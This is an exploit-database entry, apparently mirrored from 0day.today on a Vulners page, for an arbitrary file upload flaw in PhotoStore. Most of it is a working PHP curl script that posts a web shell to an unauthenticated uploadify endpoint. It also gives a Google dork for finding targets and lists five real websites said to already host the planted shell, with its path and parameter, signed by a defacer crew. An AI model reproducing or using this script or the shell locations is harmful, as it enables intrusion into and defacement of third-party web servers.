Lucene search
K

PhotoStore Arbitrary Shell upload Vulnerability

🗓️ 03 Jan 2014 00:00:00Reported by indexphpType 
zdt
 zdt
🔗 0day.today👁 40 Views

PhotoStore Arbitrary Shell upload Vulnerability on PHP 5.2 for Window

Code
#######################################################
# Exploit Title:PhotoStore Arbitrary Shell upload
# Google Dork: "site:photocity.co.za"
# Exploit Author: Index Php
# Tested on: Windows, PHP 5.2
#######################################################
#exploit

<?php

$uploadfile="ip.php";
$ch = curl_init("http://target.com/assets/uploadify/old/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
?>

shell path:
[+] Shell : photocity.co.za/ip.php?ina=hajar
[+] Shell : www.rogueeventdigitals.co.uk/ip.php?ina=hajar
[+] Shell : www.saladeprensa.co/ip.php?ina=hajar
[+] Shell : www.stockthatphoto.co.uk/ip.php?ina=hajar
[+] Shell : photokaya.com/ip.php?ina=hajar

greets Gantengers Crew - all Indonesian Defacer

#  0day.today [2018-04-12]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation